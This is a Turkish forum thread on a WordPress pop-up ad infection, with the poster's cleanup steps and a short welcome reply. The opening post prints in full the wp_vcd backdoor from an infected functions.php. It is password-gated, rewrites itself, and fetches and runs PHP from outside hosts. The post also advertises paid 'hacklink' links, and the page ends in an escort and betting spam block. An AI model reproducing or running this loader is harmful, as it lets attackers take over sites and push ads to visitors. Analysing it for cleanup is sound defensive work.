Konu Bilgileri
Konu: Wordpress Malware Hakkında Yazar: G3nzo
Okunma: 465 Yorum: 1
Konuyu Okuyanlar: 1 Ziyaretçi
Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5

#1
Öncelikle merhaba uzun zamandır yokum ancak bugun bir sorunla karşılaştım araştırdım ancak genel olarak geçici gözümler sunulmuş sorun 
Wordpress Pop-up Reklam Virüsü kısaca siz farkında olmadan arkaplanda çalışıyor siz hariç websitenize giriş yapan kişilerin tarayıcıda reklam gibi açılıyor.
Bulaştıgını nasıl anlıyoruz.

function.php ye gelip aşşagıdaki kodarı görüyoruz
 
Kod:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '22222218de5c35ff3a0f0ccadc0e1111'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{





case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
   {
   }
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='e121c363676c86e24b37374a839fbb37';
        if (($tmpcontent = @file_get_contents("http://www.trilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.trilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.trilns.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 
        elseif ($tmpcontent = @file_get_contents("http://www.trilns.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
Kod:
     
Aynı zamanda  
/wp-includes/ klasörün de wp-tmp.php ve wp-vcd.php  isimli iki dosya yer alıyor.

Çözüme gelicek olursak hep function.php yukarıdaki kodarı ve iki dosyayı silin yeter yazmışlar ancak yeterli değil her yere yayılmış ve silince muhtemelen .htaccess yüzünden 2 dk sonra tekrar geliyor nedeni kullanılan tema ve eklentiler olabilir tam bilmiyorum.

Ben nasıl çözüm buldum Veritabanı yedeğim vardı resimler kısmını ayırıp tüm Wordpress dosyalarını sildim ardından yenisi ile değiştirip kullandıgım temanın yenisini ekledim ve yine function.php izinlerini sınırlandırdım ilk tarattığım zaman 60 tane Malware görünen web sitesi şimdi tarattıgımda temiz görünüyor.
dediklerimi yaptıkdan sonra muhtemelen sorununuz düzelmş olucak her ihtimale karşı diger şifrelerinizide değiştirin.
hacklink/backlink uygun fiyatlar
Pagerank 3 : 5 Tl
Pagerank 4 : 10 Tl
Pagerank 5 : 30 Tl
Pagerank 6 : 50 Tl
Pagerank 7 : 70 Tl
Pagerank 8 : 100 Tl
+ Emekli reyiz Açık Ağızlı Gülümseme
Ara
Cevapla
#2
Hoşgeldin bro umarım sık sık görüşürüz eski günlerdeki ortam ve tat olmasa da bu forumu yine düzende tutacağız.
Ara
Cevapla


Wordpress Malware Hakkında Konusu Araçları
Direk Link
HTML Link
BBCode Link
Paylaş


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress Sitesi Olanlar Bu Eklentiyi Kurmalı Kzsg 7 1,642 09.02.2020, Saat:16:34
Son Yorum: ParaYattı
  FAALİYETLERİM HAKKINDA DUYURUM ROOTY 0 1,232 07.02.2019, Saat:10:32
Son Yorum: ROOTY
  Malwarebytes-Anti Malware (PRO) Nefer 0 1,090 18.12.2012, Saat:07:36
Son Yorum: Nefer


izmir escort izmir escort gaziantep escort canlı bahis siteleri tipobet bahis siteleri kaçak iddaa canlı bahis mobilbahis deneme bonusu deneme bonusu bodrum escort kuşadası escort türkçe altyazılı porno hack forum tepebaşı escort porno escort izmit antalya escort çekmeköy escort sancaktepe escort sultanbeyli escort seks sohbet hattı canlı sohbet hattı